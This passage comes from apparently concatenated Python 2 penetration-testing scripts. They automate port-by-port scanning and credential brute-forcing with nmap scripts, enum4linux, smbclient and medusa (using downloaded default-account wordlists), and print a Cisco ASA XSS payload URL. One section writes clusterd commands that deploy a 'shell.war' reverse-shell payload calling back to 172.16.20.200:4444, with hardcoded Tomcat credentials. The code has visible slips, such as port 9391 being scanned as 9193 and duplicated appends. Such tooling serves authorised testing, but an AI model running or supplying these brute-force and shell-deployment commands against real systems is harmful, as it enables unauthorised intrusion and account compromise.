1887 | cmdList.append(["5666",hostNo,fullCmd]) 1888 | 1889 | if taskToRun=="5850" or taskToRun=="all": 1890 | filename = origPath+"/port5850.txt" 1891 | p5850List=[] 1892 | if os.path.exists(filename): 1893 | with open(filename) as f: 1894 | for line in f: 1895 | p5850List.append(line) 1896 | logFilename=origPath+"/runPort5850.log" 1897 | if not os.path.exists(logFilename): 1898 | for host in p5850List: 1899 | host = host.strip() 1900 | 1901 | fullCmd = "nmap -p 5850 --script openlookup-info "+host+" 2>&1 >> "+logFilename 1902 | if quiet==False: 1903 | print fullCmd 1904 | cmdList.append(["5850",hostNo,fullCmd]) 1905 | 1906 | if taskToRun=="9390" or taskToRun=="all": 1907 | filename = origPath+"/port9390.txt" 1908 | p9390List=[] 1909 | if os.path.exists(filename): 1910 | with open(filename) as f: 1911 | for line in f: 1912 | p9390List.append(line) 1913 | logFilename=origPath+"/runPort9390.log" 1914 | if not os.path.exists(logFilename): 1915 | for host in p9390List: 1916 | host = host.strip() 1917 | 1918 | fullCmd = "nmap -p 9390 --script omp2-brute,omp2-enum-targets "+host+" 2>&1 >> "+logFilename 1919 | if quiet==False: 1920 | print fullCmd 1921 | cmdList.append(["9390",hostNo,fullCmd]) 1922 | 1923 | if taskToRun=="9391" or taskToRun=="all": 1924 | filename = origPath+"/port9391.txt" 1925 | p9391List=[] 1926 | if os.path.exists(filename): 1927 | with open(filename) as f: 1928 | for line in f: 1929 | p9391List.append(line) 1930 | logFilename=origPath+"/runPort9391.log" 1931 | if not os.path.exists(logFilename): 1932 | for host in p9391List: 1933 | host = host.strip() 1934 | 1935 | fullCmd = "nmap -sV --script=openvas-otp-brute -p 9193 "+host+" 2>&1 >> "+logFilename 1936 | if quiet==False: 1937 | print fullCmd 1938 | cmdList.append(["9193",hostNo,fullCmd]) 1939 | if quiet==False: 1940 | print fullCmd 1941 | cmdList.append(["9193",hostNo,fullCmd]) 1942 | 1943 | if taskToRun=="9929" or taskToRun=="all": 1944 | filename = origPath+"/port9929.txt" 1945 | p9929List=[] 1946 | if os.path.exists(filename): 1947 | with open(filename) as f: 1948 | for line in f: 1949 | p9929List.append(line) 1950 | logFilename=origPath+"/runPort9929.log" 1951 | if not os.path.exists(logFilename): 1952 | for host in p9929List: 1953 | host = host.strip() 1954 | 1955 | fullCmd = "nmap -p 9929 --script nping-brute "+host+" 2>&1 >> "+logFilename 1956 | if quiet==False: 1957 | print fullCmd 1958 | cmdList.append(["9929",hostNo,fullCmd]) 1959 | 1960 | 1961 | if taskToRun=="49152" or taskToRun=="all": 1962 | filename = origPath+"/port49152.txt" 1963 | p49152List=[] 1964 | if os.path.exists(filename): 1965 | with open(filename) as f: 1966 | for line in f: 1967 | p49152List.append(line) 1968 | logFilename=origPath+"/runPort9152.log" 1969 | if not os.path.exists(logFilename): 1970 | for host in p49152List: 1971 | host = host.strip() 1972 | 1973 | fullCmd = "nmap -p49152 --script supermicro-ipmi-conf "+host+" 2>&1 >> "+logFilename 1974 | if quiet==False: 1975 | print fullCmd 1976 | cmdList.append(["49152",hostNo,fullCmd]) 1977 | 1978 | 1979 | if taskToRun=="445" or taskToRun=="all" or taskToRun=="smb": 1980 | filename = origPath+"/port445.txt" 1981 | p445List=[] 1982 | if os.path.exists(filename): 1983 | with open(filename) as f: 1984 | for line in f: 1985 | p445List.append(line) 1986 | #cmdList = [] 1987 | for host in p445List: 1988 | host = host.strip() 1989 | logFilename=origPath+"/enum4linux_"+host+".log" 1990 | if not os.path.exists(logFilename): 1991 | fullCmd = "/pentest/SpiderLabs/enum4linux.pl -a "+host+" 2>&1 >> "+logFilename 1992 | cmdList.append(["445",hostNo,fullCmd]) 1993 | logFilename1=origPath+"/port445_"+host+".log" 1994 | if not os.path.exists(logFilename): 1995 | if not os.path.exists(logFilename1): 1996 | fullCmd = "nmap --script smb-brute.nse -p445 -iL "+origPath+"/port445.txt 2>&1 >> "+logFilename1 1997 | cmdList.append(["445",hostNo,fullCmd]) 1998 | logFilename=origPath+"/smbclient_"+host+".log" 1999 | if not os.path.exists(logFilename): 2000 | if not os.path.exists(logFilename): 2001 | fullCmd = "smbclient -L //"+host+" -N -U 'test%test'>> "+logFilename 2002 | cmdList.append(["445",hostNo,fullCmd]) 2003 | 2004 | 2005 | if taskToRun=="137" or taskToRun=="all": 2006 | filename = origPath+"/port137.txt" 2007 | p137List=[] 2008 | if os.path.exists(filename): 2009 | with open(filename) as f: 2010 | for line in f: 2011 | p137List.append(line) 2012 | #cmdList = [] 2013 | for host in p137List: 2014 | host = host.strip() 2015 | 2016 | logFilename=origPath+"/port137_"+host+".log" 2017 | if not os.path.exists(logFilename): 2018 | fullCmd = "sudo nmap -sU -sS --script smb-brute.nse -p U:137,T:139 "+host[0]+" 2>&1 >> "+logFilename 2019 | cmdList.append(["137",hostNo,fullCmd]) 2020 | 2021 | 2022 | if taskToRun=="53" or taskToRun=="all" or taskToRun=="dns": 2023 | filename = origPath+"/port53.txt" 2024 | p53List=[] 2025 | if os.path.exists(filename): 2026 | with open(filename) as f: 2027 | for line in f: 2028 | p53List.append(line) 2029 | #cmdList = [] 2030 | for host in p53List: 2031 | host = host.strip() 2032 | print host 2033 | try: 2034 | if len(options.domainName)>0: 2035 | logFilename=origPath+"/runPort53_zonetransfer_"+host+".log" 2036 | if not os.path.exists(logFilename): 2037 | fullCmd = "nmap -p 53 --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain="+options.domainName+" "+domainName+" "+host+" 2>&1 >> "+logFilename 2038 | cmdList.append(fullCmd) 2039 | cmdList.append(["53",hostNo,fullCmd]) 2040 | 2041 | except TypeError: 2042 | continue 2043 | logFilename=origPath+"/runPort53_cache_"+host+".log" 2044 | if not os.path.exists(logFilename): 2045 | fullCmd = "nmap -Pn -sU -p 53 -Pn --script dns-cache-snoop.nse --script-args 'dns-cache-snoop.mode=timed,dns-cache-snoop.domains={yahoo.com,google.com,gmail.google.com}' "+host+" 2>&1 >> "+logFilename 2046 | cmdList.append(["137",hostNo,fullCmd]) 2047 | 2048 | logFilename=origPath+"/runPort53_dig_"+host+".log" 2049 | if not os.path.exists(logFilename): 2050 | fullCmd = "dig +short yahoo.com TXT @"+host+" 2>&1 >> "+logFilename 2051 | cmdList.append(["137",hostNo,fullCmd]) 2052 | 2053 | 2054 | if len(cmdList)>0: 2055 | print "- Sorting cmdList" 2056 | cmdList = sorted(cmdList, key=lambda x: x[0]) 2057 | 2058 | print "- Slicing cmdList into chunks" 2059 | tempList = chunk(cmdList, int(numProcesses)) 2060 | totalCount=len(tempList) 2061 | count = 1 2062 | for urlList in tempList: 2063 | jobs = [] 2064 | jobid=0 2065 | print "- Set "+str(count)+" of "+str(totalCount) 2066 | for url in urlList: 2067 | if url!=None: 2068 | print "- Testing: "+url[1]+"\t"+url[0] 2069 | jobs.append((jobid,url[0],url[1],url[2])) 2070 | jobid = jobid+1 2071 | resultsList = execute1(jobs,numProcesses) 2072 | for i in resultsList: 2073 | if i[1]=="telnet": 2074 | resultsList1 = i[3].split("\n") 2075 | for line in resultsList1: 2076 | line = line.strip() 2077 | if "found:" in line.lower(): 2078 | resultListtelnet.append(i[2]) 2079 | resultListtelnet.append(line) 2080 | if i[1]=="ssh": 2081 | resultsList1 = i[3].split("\n") 2082 | for line in resultsList1: 2083 | line = line.strip() 2084 | if "found:" in line.lower(): 2085 | resultListssh.append(i[2]) 2086 | resultListssh.append(line) 2087 | if i[1]=="whatweb": 2088 | resultsList1 = i[3].split("\n") 2089 | for line in resultsList1: 2090 | line = line.strip() 2091 | resultListwhatweb.append(line) 2092 | if i[1]=="shellshock": 2093 | resultsList1 = i[3].split("\n") 2094 | for line in resultsList1: 2095 | line = line.strip() 2096 | resultListshellshock.append(line) 2097 | if i[1]=="clusterd": 2098 | resultsList1 = i[3].split("\n") 2099 | #ansi_escape = re.compile(r'\x1b[^m]*m') 2100 | #hostNo = i[2] 2101 | #for line in resultsList1: 2102 | # line = line.strip() 2103 | # line = ansi_escape.sub('', line) 2104 | # resultListclusterd.append(line) 2105 | 2106 | if i[1]=="sslcert": 2107 | resultsList1 = i[3].split("\n") 2108 | for line in resultsList1: 2109 | line = line.strip() 2110 | if "| ssl-cert: Subject: commonName=" in line and "*." not in line: 2111 | hostName = line.replace("| ssl-cert: Subject: commonName=","").split("/")[0] 2112 | resultListsslcert.append(i[2]+"\t"+hostName) 2113 | 2114 | if i[1]=="heartbleed": 2115 | resultsList1 = i[3].split("\n") 2116 | for line in resultsList1: 2117 | line = line.strip() 2118 | if "VULNERABLE:" in line: 2119 | resultListheartbleed.append(i[2]) 2120 | if i[1]=="sslknownkey": 2121 | resultsList1 = i[3].split("\n") 2122 | for line in resultsList1: 2123 | line = line.strip() 2124 | if "Found in" in line: 2125 | resultListsslknownkey.append(i[2]) 2126 | resultListsslknownkey.append(line) 2127 | 2128 | if i[1]=="sslccs": 2129 | resultsList1 = i[3].split("\n") 2130 | for line in resultsList1: 2131 | hostName = i[2] 2132 | if "may allow early" in line: 2133 | resultListsslccs.append(i[2]) 2134 | resultListsslccs.append(line) 2135 | if i[1]=="sslcert": 2136 | commonNamesList=[] 2137 | resultsList1 = i[3].split("\n") 2138 | tempTitle = "" 2139 | for line in resultsList1: 2140 | line = line.strip() 2141 | if "| ssl-cert: Subject: commonName=" in line and "*." not in line: 2142 | hostName = line.replace("| ssl-cert: Subject: commonName=","").split("/")[0] 2143 | commonNamesList.append(i[2]+"\t"+hostName) 2144 | if len(commonNamesList)>0: 2145 | print "Found the below common names in the SSL certificates" 2146 | for host in commonNamesList: 2147 | print host 2148 | 2149 | 2150 | resultList = i[3].split("\n") 2151 | count+=1 2152 | 2153 | if len(tomcatFoundList)>0: 2154 | for x in tomcatFoundList: 2155 | print x 2156 | for x in tomcatFoundList: 2157 | bruteForceTomcat(x) 2158 | 2159 | 2160 | filename = origPath+"/report.txt" 2161 | reportFilename = open(filename,"w") 2162 | 2163 | 2164 | if len(resultListwhatweb)>0: 2165 | header = "******************************** WhatWeb ********************************" 2166 | reportFilename.write(header+"\n") 2167 | for x in resultListwhatweb: 2168 | reportFilename.write(x+"\n") 2169 | 2170 | if len(resultListsslcert)>0: 2171 | header = "******************************** SSL Cert ********************************" 2172 | reportFilename.write(header+"\n") 2173 | for x in resultListsslcert: 2174 | reportFilename.write(x+"\n") 2175 | 2176 | if len(resultListsslknownkey)>0: 2177 | header = "******************************** SSL Known Key ********************************" 2178 | reportFilename.write(header+"\n") 2179 | for x in resultListsslknownkey: 2180 | reportFilename.write(x+"\n") 2181 | 2182 | if len(resultListsslccs)>0: 2183 | header = "******************************** SSL CCS ********************************" 2184 | reportFilename.write(header+"\n") 2185 | for x in resultListsslccs: 2186 | reportFilename.write(x+"\n") 2187 | 2188 | if len(resultListheartbleed)>0: 2189 | header = "******************************** SSL Heartbleed ********************************" 2190 | reportFilename.write(header+"\n") 2191 | for x in resultListheartbleed: 2192 | reportFilename.write(x+"\n") 2193 | 2194 | if len(resultListssh)>0: 2195 | header = "******************************** SSH ********************************" 2196 | reportFilename.write(header+"\n") 2197 | for x in resultListssh: 2198 | reportFilename.write(x+"\n") 2199 | 2200 | if len(resultListtelnet)>0: 2201 | header = "******************************** Telnet ********************************" 2202 | reportFilename.write(header+"\n") 2203 | for x in resultListtelnet: 2204 | reportFilename.write(x+"\n") 2205 | 2206 | #for x in resultListssl: 2207 | # reportFilename.write(x+"\n") 2208 | 2209 | if len(resultList25)>0: 2210 | header = "******************************** Port 25 ********************************" 2211 | reportFilename.write(header+"\n") 2212 | for x in resultList25: 2213 | reportFilename.write(x+"\n") 2214 | 2215 | if len(resultList53)>0: 2216 | header = "******************************** Port 53********************************" 2217 | reportFilename.write(header+"\n") 2218 | for x in resultList53: 2219 | reportFilename.write(x+"\n") 2220 | 2221 | if len(resultList137)>0: 2222 | header = "******************************** Port 137 ********************************" 2223 | reportFilename.write(header+"\n") 2224 | for x in resultList137: 2225 | reportFilename.write(x+"\n") 2226 | 2227 | if len(resultList139)>0: 2228 | header = "******************************** Port 139 ********************************" 2229 | reportFilename.write(header+"\n") 2230 | for x in resultList139: 2231 | reportFilename.write(x+"\n") 2232 | 2233 | if len(resultList161)>0: 2234 | header = "******************************** Port 161 ********************************" 2235 | reportFilename.write(header+"\n") 2236 | for x in resultList161: 2237 | reportFilename.write(x+"\n") 2238 | 2239 | if len(resultList445)>0: 2240 | header = "******************************** Port 445 ********************************" 2241 | reportFilename.write(header+"\n") 2242 | for x in resultList445: 2243 | reportFilename.write(x+"\n") 2244 | 2245 | if len(resultList500)>0: 2246 | header = "******************************** Port 500 ********************************" 2247 | reportFilename.write(header+"\n") 2248 | for x in resultList500: 2249 | reportFilename.write(x+"\n") 2250 | 2251 | if len(resultList512)>0: 2252 | header = "******************************** Port 512 ********************************" 2253 | reportFilename.write(header+"\n") 2254 | for x in resultList512: 2255 | reportFilename.write(x+"\n") 2256 | 2257 | if len(resultList513)>0: 2258 | header = "******************************** Port 513 ********************************" 2259 | reportFilename.write(header+"\n") 2260 | for x in resultList513: 2261 | reportFilename.write(x+"\n") 2262 | 2263 | if len(resultList554)>0: 2264 | header = "******************************** Port 554 ********************************" 2265 | reportFilename.write(header+"\n") 2266 | for x in resultList554: 2267 | reportFilename.write(x+"\n") 2268 | 2269 | if len(resultList873)>0: 2270 | header = "******************************** Port 873 ********************************" 2271 | reportFilename.write(header+"\n") 2272 | for x in resultList873: 2273 | reportFilename.write(x+"\n") 2274 | 2275 | if len(resultList902)>0: 2276 | header = "******************************** Port 902 ********************************" 2277 | reportFilename.write(header+"\n") 2278 | for x in resultList902: 2279 | reportFilename.write(x+"\n") 2280 | 2281 | if len(resultList1080)>0: 2282 | header = "******************************** Port 1080 ********************************" 2283 | reportFilename.write(header+"\n") 2284 | for x in resultList1080: 2285 | reportFilename.write(x+"\n") 2286 | 2287 | if len(resultList1099)>0: 2288 | header = "******************************** Port 1099 ********************************" 2289 | reportFilename.write(header+"\n") 2290 | for x in resultList1099: 2291 | reportFilename.write(x+"\n") 2292 | 2293 | if len(resultList1723)>0: 2294 | header = "******************************** Port 1723 ********************************" 2295 | reportFilename.write(header+"\n") 2296 | for x in resultList1723: 2297 | reportFilename.write(x+"\n") 2298 | 2299 | if len(resultList2002)>0: 2300 | header = "******************************** Port 2002 ********************************" 2301 | reportFilename.write(header+"\n") 2302 | for x in resultList2002: 2303 | reportFilename.write(x+"\n") 2304 | 2305 | if len(resultList2010)>0: 2306 | header = "******************************** Port 2010 ********************************" 2307 | reportFilename.write(header+"\n") 2308 | for x in resultList2010: 2309 | reportFilename.write(x+"\n") 2310 | 2311 | if len(resultList2401)>0: 2312 | header = "******************************** Port 2401 ********************************" 2313 | reportFilename.write(header+"\n") 2314 | for x in resultList2401: 2315 | reportFilename.write(x+"\n") 2316 | 2317 | if len(resultList3306)>0: 2318 | header = "******************************** Port 3389 ********************************" 2319 | reportFilename.write(header+"\n") 2320 | for x in resultList3306: 2321 | reportFilename.write(x+"\n") 2322 | 2323 | if len(resultList3389)>0: 2324 | header = "******************************** Port 3389 ********************************" 2325 | reportFilename.write(header+"\n") 2326 | for x in resultList3389: 2327 | reportFilename.write(x+"\n") 2328 | 2329 | if len(resultList5432)>0: 2330 | header = "******************************** Port 5432 ********************************" 2331 | reportFilename.write(header+"\n") 2332 | for x in resultList5432: 2333 | reportFilename.write(x+"\n") 2334 | 2335 | if len(resultList5850)>0: 2336 | header = "******************************** Port 5850 ********************************" 2337 | reportFilename.write(header+"\n") 2338 | for x in resultList5850: 2339 | reportFilename.write(x+"\n") 2340 | 2341 | if len(resultList5900)>0: 2342 | header = "******************************** Port 5900 ********************************" 2343 | reportFilename.write(header+"\n") 2344 | for x in resultList5900: 2345 | reportFilename.write(x+"\n") 2346 | 2347 | if len(resultList6379)>0: 2348 | header = "******************************** Port 6379 ********************************" 2349 | reportFilename.write(header+"\n") 2350 | for x in resultList6379: 2351 | reportFilename.write(x+"\n") 2352 | 2353 | if len(resultList8098)>0: 2354 | header = "******************************** Port 8098 ********************************" 2355 | reportFilename.write(header+"\n") 2356 | for x in resultList8098: 2357 | reportFilename.write(x+"\n") 2358 | 2359 | if len(resultList9160)>0: 2360 | header = "******************************** Port 9160 ********************************" 2361 | reportFilename.write(header+"\n") 2362 | for x in resultList9160: 2363 | reportFilename.write(x+"\n") 2364 | 2365 | if len(resultList5432)>0: 2366 | header = "******************************** Port 5432 ********************************" 2367 | reportFilename.write(header+"\n") 2368 | for x in resultList5432: 2369 | reportFilename.write(x+"\n") 2370 | 2371 | if len(resultList5666)>0: 2372 | header = "******************************** Port 5666 ********************************" 2373 | reportFilename.write(header+"\n") 2374 | for x in resultList5666: 2375 | reportFilename.write(x+"\n") 2376 | 2377 | if len(resultList9390)>0: 2378 | header = "******************************** Port 9390 ********************************" 2379 | reportFilename.write(header+"\n") 2380 | for x in resultList9390: 2381 | reportFilename.write(x+"\n") 2382 | 2383 | if len(resultList9391)>0: 2384 | header = "******************************** Port 9391 ********************************" 2385 | reportFilename.write(header+"\n") 2386 | for x in resultList9391: 2387 | reportFilename.write(x+"\n") 2388 | 2389 | if len(resultList9929)>0: 2390 | header = "******************************** Port 9929 ********************************" 2391 | reportFilename.write(header+"\n") 2392 | for x in resultList9929: 2393 | reportFilename.write(x+"\n") 2394 | 2395 | if len(resultList27017)>0: 2396 | header = "******************************** Port 27017 ********************************" 2397 | reportFilename.write(header+"\n") 2398 | for x in resultList27017: 2399 | reportFilename.write(x+"\n") 2400 | 2401 | if len(resultList49152)>0: 2402 | header = "******************************** Port 49152 ********************************" 2403 | reportFilename.write(header+"\n") 2404 | for x in resultList49152: 2405 | reportFilename.write(x+"\n") 2406 | 2407 | reportFilename.close() 2408 | ##End of Module 2409 | 2410 | 2411 | if len(resultListASAXSS)>0: 2412 | print "\n****** Cisco ASA XSS Vulnerability ****** " 2413 | for x in resultListASAXSS: 2414 | print "https://"+x+"/+CSCOE+/logon.html?reason=2&auth_handle=\"%20style%3dbehavior%3aurl('%23default%23time2')%20onbegin%3d'alert(String.fromCharCode(88,83,83))'" 2415 | 2416 | 2417 | if __name__ == '__main__': 2418 | #global numProcesses 2419 | parser = argparse.ArgumentParser() 2420 | parser.add_argument('-quiet', action='store_true', help='[only show results]') 2421 | parser.add_argument('-results', action='store_true', help='[parse log files and show results]') 2422 | parser.add_argument('-tasks', dest='taskName', action='store', help='[task name]') 2423 | parser.add_argument('-threads', dest='numProcesses', action='store', help='[number of threads]') 2424 | parser.add_argument('-domain', dest='domainName', action='store', help='[domain name]') 2425 | 2426 | #if len(sys.argv)==1: 2427 | # parser.print_help() 2428 | # sys.exit(1) 2429 | 2430 | options = parser.parse_args() 2431 | 2432 | os.chdir(origPath) 2433 | taskList=[] 2434 | taskList.append("bruteURL") 2435 | taskList.append("1080") 2436 | taskList.append("1098") 2437 | taskList.append("1099") 2438 | taskList.append("137") 2439 | taskList.append("139") 2440 | taskList.append("1723") 2441 | taskList.append("2002") 2442 | taskList.append("2010") 2443 | taskList.append("2401") 2444 | taskList.append("25") 2445 | taskList.append("27017") 2446 | taskList.append("3306") 2447 | taskList.append("3389") 2448 | taskList.append("49152") 2449 | taskList.append("5060") 2450 | taskList.append("512") 2451 | taskList.append("513") 2452 | taskList.append("5432") 2453 | taskList.append("554") 2454 | taskList.append("5666") 2455 | taskList.append("5850") 2456 | taskList.append("5900") 2457 | taskList.append("6379") 2458 | taskList.append("8098") 2459 | taskList.append("873") 2460 | taskList.append("902") 2461 | taskList.append("9160") 2462 | taskList.append("9390") 2463 | taskList.append("9391") 2464 | taskList.append("9929") 2465 | taskList.append("asa") 2466 | taskList.append("clusterd") 2467 | taskList.append("dns") 2468 | taskList.append("ftp") 2469 | taskList.append("ntp") 2470 | #taskList.append("shellshock") 2471 | taskList.append("smb") 2472 | taskList.append("snmp") 2473 | taskList.append("ssh") 2474 | taskList.append("ssl") 2475 | taskList.append("telnet") 2476 | taskList.append("tilde") 2477 | taskList.append("vpn") 2478 | taskList.append("whatweb") 2479 | taskList.append("xmpp") 2480 | taskList.append("yasuo") 2481 | 2482 | #Removing empty log files 2483 | for filename in glob.glob(os.getcwd()+"/*.log"): 2484 | if os.stat(filename).st_size == 0: 2485 | os.remove(filename) 2486 | if options.results: 2487 | parseLogs() 2488 | sys.exit() 2489 | if options.domainName: 2490 | domainName=domainName 2491 | 2492 | if options.numProcesses: 2493 | numProcesses=str(options.numProcesses) 2494 | else: 2495 | numProcesses=str(10) 2496 | 2497 | if (str(options.taskName).lower()).strip()!="all": 2498 | if options.quiet: 2499 | taskToRun=options.taskName 2500 | runModules(quiet=True) 2501 | sys.exit() 2502 | else: 2503 | taskToRun=options.taskName 2504 | runModules(quiet=True) 2505 | sys.exit() 2506 | else: 2507 | for taskName in taskList: 2508 | taskToRun=taskName 2509 | runModules(quiet=True) 2510 | #parseLogs() 2511 | sys.exit() 2512 | 2513 | ''' 2514 | #Zipping PeepingTom Screenshots 2515 | #if glob.glob(os.getcwd()+"/peepingtom/1*"): 2516 | # cmd = "zip screenshots.zip -r "+os.getcwd()+"/peepingtom/1*" 2517 | # print commands.getoutput(cmd) 2518 | ''' 2519 | 2520 | #Parsing and Running Clusterd Attack Payloads 2521 | resultList=[] 2522 | for filename in glob.glob("runClusterd*.log"): 2523 | #filename = sys.argv[1] 2524 | filenameParts = filename.split("_") 2525 | 2526 | portNo = filenameParts[3].replace(".log","") 2527 | hostIP = filenameParts[1]+"://"+filenameParts[2].replace(".log","")+":"+portNo 2528 | 2529 | lines = [] 2530 | with open(filename) as f: 2531 | lines = f.read().splitlines() 2532 | ansi_escape = re.compile(r'\x1b[^m]*m') 2533 | #found=False 2534 | for line in lines: 2535 | line = ansi_escape.sub('', line) 2536 | if "] " in line: 2537 | #if found==False: 2538 | # resultList.append("\n"+hostIP) 2539 | # found=True 2540 | line1 = line.split("] ")[1].strip() 2541 | resultList.append([hostIP,line1]) 2542 | if len(resultList)>0: 2543 | file = open("runJboss.sh", "a+") 2544 | cmd = "cd /tmp1/clusterd" 2545 | file.write(cmd+"\n") 2546 | for result in resultList: 2547 | if "jboss" in result[1].lower(): 2548 | scheme = result[0].split(":")[0] 2549 | hostNo = result[0].split(":")[1].replace("//","") 2550 | portNo = result[0].split(":")[2] 2551 | 2552 | url = scheme+"://"+hostNo+":"+portNo 2553 | if scheme=="http": 2554 | cmd = "cd "+clusterdPath+" && python "+clusterdPath+"/clusterd.py -i "+hostNo+" -p "+portNo+" -a jboss -v4.2 --random-agent --jb-smb --jb-info" 2555 | if scheme=="https": 2556 | cmd = "cd "+clusterdPath+" && python "+clusterdPath+"/clusterd.py --ssl -i "+hostNo+" -p "+portNo+" -a jboss -v4.2 --random-agent --jb-smb --jb-info" 2557 | print cmd 2558 | file.write(cmd+"\n") 2559 | file.close() 2560 | 2561 | file = open("runTomcat.sh", "a+") 2562 | cmd = "cd /tmp1/clusterd" 2563 | file.write(cmd+"\n") 2564 | for result in resultList: 2565 | if "tomcat manager" in result[1].lower(): 2566 | scheme = result[0].split(":")[0] 2567 | hostNo = result[0].split(":")[1].replace("//","") 2568 | porTNo = result[0].split(":")[2] 2569 | 2570 | #cmd = "python /tmp1/clusterd/clusterd.py -i "+hostNo+" -p "+portNo+" -a tomcat --tc-ofetch --tc-info --tc-list --tc-smb" 2571 | #cmd = "python /tmp1/clusterd/clusterd.py -i "+hostNo+" -p "+portNo+" -a tomcat --gen-payload 172.16.20.200:4444 --deploy shell.war --invoke --rand-payload -o windows -b admin --wordlist /tmp1/passwords.txt --tc-ofetch --tc-info --tc-list --tc-smb"" 2572 | 2573 | if scheme=="http": 2574 | cmd = "cd "+clusterdPath+" && python "+clusterdPath+"/clusterd.py -i "+hostNo+" -p "+portNo+" -a tomcat --usr-auth admin:Tomct123$ --gen-payload 172.16.20.200:4444 --deploy shell.war --invoke --rand-payload -o linux -b admin --wordlist /tmp1/passwords.txt --tc-ofetch --tc-info --tc-list --tc-smb" 2575 | if scheme=="https": 2576 | cmd = "cd "+clusterdPath+" && python "+clusterdPath+"/clusterd.py --ssl -i "+hostNo+" -p "+portNo+" -a tomcat --usr-auth admin:Tomct123$ --gen-payload 172.16.20.200:4444 --deploy shell.war --invoke --rand-payload -o linux -b admin --wordlist /tmp1/passwords.txt --tc-ofetch --tc-info --tc-list --tc-smb" 2577 | 2578 | print cmd 2579 | file.write(cmd+"\n") 2580 | file.close() 2581 | -------------------------------------------------------------------------------- /runSSHmulti.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from multiprocessing import Queue 4 | import multiprocessing 5 | import commands 6 | import sys 7 | import argparse 8 | import os 9 | 10 | origPath = os.getcwd() 11 | toolsPath = "/tmp/tools/" 12 | numProcesses = 10 13 | 14 | def downloadFiles(): 15 | import urllib 16 | if not os.path.exists(toolsPath+"wordList_ssh.txt"): 17 | testfile = urllib.URLopener() 18 | testfile.retrieve("https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_ssh.txt", toolsPath+"wordList_ssh.txt") 19 | if not os.path.exists(toolsPath+"wordList_telnet.txt"): 20 | testfile = urllib.URLopener() 21 | testfile.retrieve("https://raw.githubusercontent.com/milo2012/pentest_scripts/master/default_accounts_wordlist/wordList_telnet.txt", toolsPath+"wordList_telnet.txt") 22 | 23 | def RunCommand(fullCmd): 24 | try: 25 | return commands.getoutput(fullCmd) 26 | except: 27 | return "Error executing command %s" %(fullCmd) 28 | class Worker1(multiprocessing.Process): 29 | 30 | def __init__(self, 31 | work_queue, 32 | result_queue, 33 | ): 34 | multiprocessing.Process.__init__(self) 35 | self.work_queue = work_queue 36 | self.result_queue = result_queue 37 | self.kill_received = False 38 | def run(self): 39 | while (not (self.kill_received)) and (self.work_queue.empty()==False): 40 | try: 41 | job = self.work_queue.get_nowait() 42 | except: 43 | break 44 | (jobid,hostNo,runCmd) = job 45 | rtnVal = (jobid,hostNo,RunCommand(runCmd)) 46 | self.result_queue.put(rtnVal) 47 | 48 | def execute1(jobs, num_processes=2): 49 | work_queue = multiprocessing.Queue() 50 | for job in jobs: 51 | work_queue.put(job) 52 | 53 | result_queue = multiprocessing.Queue() 54 | worker = [] 55 | for i in range(num_processes): 56 | worker.append(Worker1(work_queue, result_queue)) 57 | worker[i].start() 58 | 59 | results = [] 60 | while len(results) < len(jobs): 61 | result = result_queue.get() 62 | results.append(result) 63 | results.sort() 64 | return (results) 65 | os.chdir(origPath) 66 | 67 | sslList=[] 68 | 69 | def runModules(quiet): 70 | #Start of Module 71 | results = "\n- Checking for Nmap SSHv1" 72 | print results 73 | jobs = [] 74 | jobid = 0 75 | 76 | for host in sslList: 77 | fullCmd="nmap -sT --script=sshv1 -h "+host[0]+" -p "+host[1] 78 | if quiet==False: 79 | print fullCmd 80 | jobs.append((jobid,host[0],fullCmd)) 81 | jobid = jobid+1 82 | resultsList = execute1(jobs,numProcesses) 83 | for i in resultsList: 84 | if "Server supports SSHv1" in str(i): 85 | print line 86 | #End of Module 87 | 88 | #Start of Module 89 | results = "\n- Bruteforcing SSH Servers with Medusa" 90 | print results 91 | jobs = [] 92 | jobid = 0 93 | 94 | for host in sslList: 95 | fullCmd="medusa -M ssh -C "+toolsPath+"wordList_ssh.txt -h "+host[0]+" -p "+host[1]+" -T4 -t4 -f -F" 96 | if quiet==False: 97 | print fullCmd 98 | jobs.append((jobid,host[0],fullCmd)) 99 | jobid = jobid+1 100 | resultsList = execute1(jobs,numProcesses) 101 | for i in resultsList: 102 | resultsList1 = i[2].split("\n") 103 | for line in resultsList1: 104 | line = line.strip() 105 | print line 106 | #End of Module 107 | 108 | 109 | if __name__ == '__main__': 110 | parser = argparse.ArgumentParser() 111 | parser.add_argument('-quiet', action='store_true', help='[only show results]') 112 | parser.add_argument('-file', dest='filename', action='store', help='[file containing IPs and Ports]') 113 | parser.add_argument('-threads', dest='numProcesses', action='store', help='[number of threads]') 114 | 115 | if len(sys.argv)==1: 116 | parser.print_help() 117 | sys.exit(1) 118 | 119 | options = parser.parse_args() 120 | 121 | downloadFiles() 122 | 123 | if options.numProcesses: 124 | numProcesses=int(options.numProcesses) 125 | else: 126 | numProcesses=int(10) 127 | if not options.filename: 128 | parser.print_help() 129 | sys.exit(1) 130 | else: 131 | with open(options.filename) as f: 132 | for line in f: 133 | line = line.strip() 134 | line1 = line.split(":") 135 | hostNo = line1[0] 136 | hostPort = line1[1] 137 | sslList.append((hostNo,hostPort)) 138 | 139 | if options.quiet: 140 | runModules(quiet=True) 141 | else: 142 | runModules(quiet=False) 143 | -------------------------------------------------------------------------------- /runSSLmulti.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python 2 | 3 | from multiprocessing import Queue 4 | import multiprocessing 5 | import commands 6 | import sys 7 | import argparse 8 | import os 9 | 10 | origPath = os.getcwd() 11 | toolsPath = "/tmp/tools" 12 | tlssledPath = toolsPath+"/" 13 | numProcesses = 10 14 | 15 | def RunCommand(fullCmd): 16 | try: 17 | return commands.getoutput(fullCmd) 18 | except: 19 | return "Error executing command %s" %(fullCmd) 20 | class Worker1(multiprocessing.Process): 21 | 22 | def __init__(self, 23 | work_queue, 24 | result_queue, 25 | ): 26 | multiprocessing.Process.__init__(self) 27 | self.work_queue = work_queue 28 | self.result_queue = result_queue 29 | self.kill_received = False 30 | def run(self): 31 | while (not (self.kill_received)) and (self.work_queue.empty()==False): 32 | try: 33 | job = self.work_queue.get_nowait() 34 | except: 35 | break 36 | (jobid,hostNo,runCmd) = job 37 | rtnVal = (jobid,hostNo,RunCommand(runCmd)) 38 | self.result_queue.put(rtnVal) 39 | 40 | def execute1(jobs, num_processes=2): 41 | work_queue = multiprocessing.Queue() 42 | for job in jobs: 43 | 